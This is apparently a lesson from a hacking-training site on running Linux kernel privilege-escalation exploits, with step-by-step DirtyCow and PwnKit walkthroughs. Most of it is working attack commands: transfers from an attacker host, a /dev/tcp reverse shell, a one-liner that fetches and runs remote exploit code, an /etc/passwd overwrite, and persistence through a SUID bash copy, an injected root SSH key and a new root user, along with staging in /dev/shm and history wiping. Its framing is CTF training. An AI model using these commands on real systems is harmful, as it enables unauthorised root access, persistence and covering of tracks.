Kernel Exploit Execution

advanced40 minWriteup

Compiling and running kernel exploits

Learning Objectives

  • Compile kernel exploits
  • Transfer exploits safely
  • Execute kernel exploits
  • Handle exploit failures

You've

and found a potential vulnerability. Now comes the scary part - actually running the exploit. Kernel exploitation is like performing surgery on a running patient. One wrong move and the whole system crashes.

This lesson covers the practical steps: compiling exploits, transferring them, executing them safely, and what to do when things go wrong. We'll walk through real examples step by step.

Last Resort Warning

Kernel exploits should be your LAST option. Always try sudo, SUID, cron, and other safer methods first. Kernel exploits can crash systems, corrupt data, and leave traces. In CTFs, a crash means losing your shell.

Compiling Kernel Exploits

bash
1606070;"># Most kernel exploits are in C
2606070;"># You need to compile them for the target architecture
3 
4606070;"># On your attack machine (Kali):
5606070;"># Check architecture first
6uname -m
7606070;"># x86_64 or i686
8 
9606070;"># Compile for 64-bit target
10gcc exploit.c -o exploit
11 
12606070;"># Compile for 32-bit target (from 64-bit machine)
13gcc -m32 exploit.c -o exploit
14 
15606070;"># Some exploits need specific flags
16gcc exploit.c -o exploit -lpthread      606070;"># Threading library
17gcc exploit.c -o exploit -static        606070;"># Static compilation (no dependencies)
18gcc exploit.c -o exploit -pthread -lcrypt  606070;"># Multiple libraries
19 
20606070;"># Check what the exploit needs - read the header!
21head -50 exploit.c
22606070;"># Look for: gcc commands, required libraries, compilation notes
23 
24606070;"># Example real headers:
25606070;"># // gcc -o exploit exploit.c -lpthread
26606070;"># // Compile: gcc -pthread exploit.c -o exploit
27606070;"># // Requires: libcrypt

Cross-Compilation

bash
1606070;"># If target is different architecture than attacker:
2 
3606070;"># Compile 32-bit on 64-bit Kali
4sudo apt install gcc-multilib
5gcc -m32 exploit.c -o exploit32
6 
7606070;"># Cross-compile for ARM (rare but possible)
8sudo apt install gcc-arm-linux-gnueabi
9arm-linux-gnueabi-gcc exploit.c -o exploit_arm
10 
11606070;"># Static compilation - includes all libraries
12606070;"># Useful when target has different library versions
13gcc exploit.c -o exploit -static
14606070;"># Warning: Creates larger binary
15 
16606070;"># Check resulting binary
17file exploit
18606070;"># exploit: ELF 64-bit LSB executable, x86-64...

Compile on Target

If the target has GCC installed, compile there to avoid architecture mismatches. Just transfer the source code instead of the binary.

Transferring Exploits

bash
1606070;"># Method 1: Python HTTP server (most common)
2606070;"># On attacker:
3python3 -m http.server 8000
4606070;"># Or Python 2:
5python -m SimpleHTTPServer 8000
6 
7606070;"># On target:
8wget http:606070;">//ATTACKER_IP:8000/exploit
9606070;"># or
10curl http:606070;">//ATTACKER_IP:8000/exploit -o exploit
11chmod +x exploit
12 
13606070;"># Method 2: Netcat
14606070;"># On attacker:
15nc -lvnp 4444 < exploit
16606070;"># On target:
17nc ATTACKER_IP 4444 > exploit
18chmod +x exploit
19 
20606070;"># Method 3: Base64 (if no network tools)
21606070;"># On attacker:
22base64 exploit | tr -d 606070;">#a5d6ff;">'\n'
23606070;"># Copy output
24 
25606070;"># On target:
26echo 606070;">#a5d6ff;">"BASE64_STRING_HERE" | base64 -d > exploit
27chmod +x exploit
28 
29606070;"># Method 4: SCP (if you have SSH)
30scp exploit user@target:/tmp/exploit
31 
32606070;"># Method 5: Upload directory (web shell)
33606070;"># If you have file upload capability, use that
34 
35606070;"># Good locations to store exploits:
36/tmp/
37/dev/shm/           606070;"># RAM-based, no disk writes
38/var/tmp/
39$HOME/

/dev/shm for Stealth

/dev/shm is stored in RAM, not disk. Files here don't persist after reboot and leave fewer forensic traces. Perfect for exploit staging.

Running Kernel Exploits

bash
1606070;"># Before running - create a backup shell!
2606070;"># If exploit crashes system, you lose your shell
3 
4606070;"># Start second reverse shell to attacker
5bash -i >& /dev/tcp/ATTACKER/4445 0>&1 &
6606070;"># Now you have a backup if something goes wrong
7 
8606070;"># Basic execution
9cd /tmp
10./exploit
11 
12606070;"># Some exploits need arguments
13./exploit 0  606070;"># Offset value
14./exploit --target 1  606070;"># Target version
15 
16606070;"># Common patterns:
17 
18606070;"># DirtyCow pattern (writes to file)
19./dirtycow /etc/passwd 606070;">#a5d6ff;">"hacker:x:0:0::/root:/bin/bash"
20 
21606070;"># Generic "spawn root shell" pattern
22./exploit
23606070;"># id
24606070;"># uid=0(root) gid=0(root)
25 
26606070;"># PwnKit pattern
27./pwnkit
28606070;"># Instantly drops you to root
29 
30606070;"># Some exploits need you to run commands after
31./exploit
32606070;"># Exploit says: "Now run: su - hacker"
33su - hacker

Handling Exploit Failures

bash
1606070;"># If exploit crashes the shell but system survives:
2606070;"># Reconnect via your backup shell
3 
4606070;"># If exploit hangs:
5606070;"># Ctrl+C to cancel (might not work)
6606070;"># Kill from backup shell: kill -9 $(pgrep exploit)
7 
8606070;"># If exploit errors:
9606070;"># Read the error carefully!
10 
11606070;"># Common errors:
12606070;"># "Segmentation fault" - Wrong architecture or kernel version
13606070;"># "Permission denied" - Need to chmod +x
14606070;"># "No such file or directory" - Missing library
15606070;"># "Kernel not vulnerable" - Exploit checked and failed
16 
17606070;"># Wrong architecture:
18./exploit
19606070;"># bash: ./exploit: cannot execute binary file
20606070;"># Solution: Recompile for correct arch
21 
22606070;"># Missing library:
23./exploit
24606070;"># ./exploit: error while loading shared libraries: libpthread.so.0
25606070;"># Solution: Compile with -static or install library
26 
27606070;"># If exploit partially works (creates files but no root):
28606070;"># Check what it created
29ls -la /tmp/
30606070;"># Maybe a SUID shell was created?

DirtyCow Walkthrough

DirtyCow (CVE-2016-5195) is one of the most famous kernel exploits. Let's walk through using it step by step.

bash
1606070;"># Check if vulnerable (kernel < 4.8.3)
2uname -r
3606070;"># 3.13.0-32-generic - VULNERABLE!
4 
5606070;"># Search for exploit
6searchsploit dirty cow
7searchsploit -m linux/local/40839.c  606070;"># passwd overwrite version
8 
9606070;"># Transfer to target
10python3 -m http.server 8000
11606070;"># On target:
12wget http:606070;">//ATTACKER:8000/40839.c
13 
14606070;"># Compile on target (if GCC available)
15gcc -pthread 40839.c -o dirty -lcrypt
16 
17606070;"># Or compile on attacker and transfer binary
18gcc -pthread 40839.c -o dirty -lcrypt -static
19 
20606070;"># Run the exploit
21./dirty
22606070;"># Please enter the new password:
23606070;"># Type your password (e.g., "hacked")
24 
25606070;"># Exploit runs...
26606070;"># Complete line:
27606070;"># firefart:fi6bS9A.C" ..."root:/root:/bin/bash
28 
29606070;"># Now switch to new root user
30su firefart
31606070;"># Password: hacked
32id
33606070;"># uid=0(root) gid=0(root)
34 
35606070;"># Alternative: DirtyCow SUID version
36searchsploit -m linux/local/40847.cpp
37g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
38./dcow
39606070;"># Creates backup of /usr/bin/passwd, writes SUID binary

DirtyCow Side Effects

DirtyCow exploits a race condition and can corrupt files. Always backup files before overwriting. The /etc/passwd modification persists - remember to clean up!

PwnKit Walkthrough

bash
1606070;"># PwnKit (CVE-2021-4034) - pkexec vulnerability
2606070;"># Affects almost all Linux distros from 2009-2022
3 
4606070;"># Check if vulnerable
5pkexec --version
6606070;"># pkexec version 0.105 or earlier = likely vulnerable
7 
8606070;"># Multiple exploit versions available
9606070;"># Method 1: One-liner Python version
10python3 -c 606070;">#a5d6ff;">"$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.py)"
11 
12606070;"># Method 2: Compiled version
13wget https:606070;">//github.com/ly4k/PwnKit/raw/main/PwnKit
14chmod +x PwnKit
15./PwnKit
16606070;"># root@victim:/tmp# id
17606070;"># uid=0(root) gid=0(root)
18 
19606070;"># Method 3: Build yourself (more reliable)
20git clone https:606070;">//github.com/berdav/CVE-2021-4034
21cd CVE-2021-4034
22make
23./cve-2021-4034
24606070;"># Instant root shell
25 
26606070;"># Method 4: If curl/wget blocked
27606070;"># Base64 encode on attacker, paste on target
28base64 PwnKit | tr -d 606070;">#a5d6ff;">'\n'
29606070;"># On target:
30echo 606070;">#a5d6ff;">"BASE64HERE" | base64 -d > /tmp/pwnkit
31chmod +x /tmp/pwnkit
32/tmp/pwnkit

PwnKit is Reliable

Unlike many kernel exploits, PwnKit rarely crashes systems. It's a good first choice when available. Always check pkexec version first.

Fixing Compilation Errors

bash
1606070;"># Common compilation issues and fixes:
2 
3606070;"># Missing header files
4exploit.c:5:10: fatal error: linux/netfilter.h: No such file or directory
5606070;"># Fix: Install kernel headers
6apt install linux-headers-$(uname -r)
7 
8606070;"># Undefined reference errors
9undefined reference to 606070;">#a5d6ff;">'pthread_create'
10606070;"># Fix: Add library flag
11gcc exploit.c -o exploit -lpthread
12 
13606070;"># Architecture mismatch
14/usr/include/linux/types.h:5: error: unknown type name 606070;">#a5d6ff;">'uint64_t'
15606070;"># Fix: Include stdint.h or compile with -m32/-m64
16 
17606070;"># Old GCC version issues
18606070;"># Some exploits need newer C standards
19gcc -std=c99 exploit.c -o exploit
20606070;"># or
21gcc -std=gnu99 exploit.c -o exploit
22 
23606070;"># Multiple errors - try static
24gcc exploit.c -o exploit -static
25 
26606070;"># Still failing? Read exploit comments
27head -100 exploit.c
28606070;"># Authors often explain exact compilation

Post-Exploitation Steps

bash
1606070;"># Once kernel exploit succeeds and you have root:
2 
3606070;"># 1. Verify root
4id
5whoami
6 
7606070;"># 2. Get persistent access (don't rely on exploit)
8606070;"># SUID bash
9cp /bin/bash /tmp/rootbash
10chmod +s /tmp/rootbash
11606070;"># Access: /tmp/rootbash -p
12 
13606070;"># SSH key
14mkdir -p /root/.ssh
15echo 606070;">#a5d6ff;">"YOUR_SSH_KEY" >> /root/.ssh/authorized_keys
16 
17606070;"># New user
18echo 606070;">#a5d6ff;">'hacker:$1$xyz$abc:0:0:root:/root:/bin/bash' >> /etc/passwd
19 
20606070;"># 3. Clean up exploit traces
21rm /tmp/exploit
22rm -f /dev/shm/exploit
23history -c
24 
25606070;"># 4. Get the flag (CTF)
26cat /root/root.txt
27 
28606070;"># 5. If this was DirtyCow - restore files
29606070;"># DirtyCow may have corrupted /etc/passwd
30606070;"># Restore from your backup if needed

Kernel Exploitation Methodology

Kernel Exploit Execution Flow

1
BackupCreate backup shell connection first
2
CompileCompile for correct architecture with needed libraries
3
TransferUpload via HTTP, nc, or base64
4
StagePlace in /tmp or /dev/shm, chmod +x
5
ExecuteRun with any required arguments
6
PersistCreate SUID bash or SSH key immediately

Knowledge Check

Quick Quiz
Question 1 of 3

Why should you create a backup shell before running a kernel exploit?

Challenges

Exploit a Vulnerable Kernel

Challenge
💀 advanced

Given a Linux system with kernel 3.13.0-24 (Ubuntu 14.04), compile and execute a kernel exploit to gain root access.

Need a hint? (4 available)

Key Takeaways

  • Always create backup shell before running kernel exploits
  • Match compile architecture to target (x86_64 vs i686)
  • Use -static to include all libraries in binary
  • /dev/shm is RAM-based, good for staging exploits
  • Read exploit headers for compile instructions
  • Create persistent access immediately after gaining root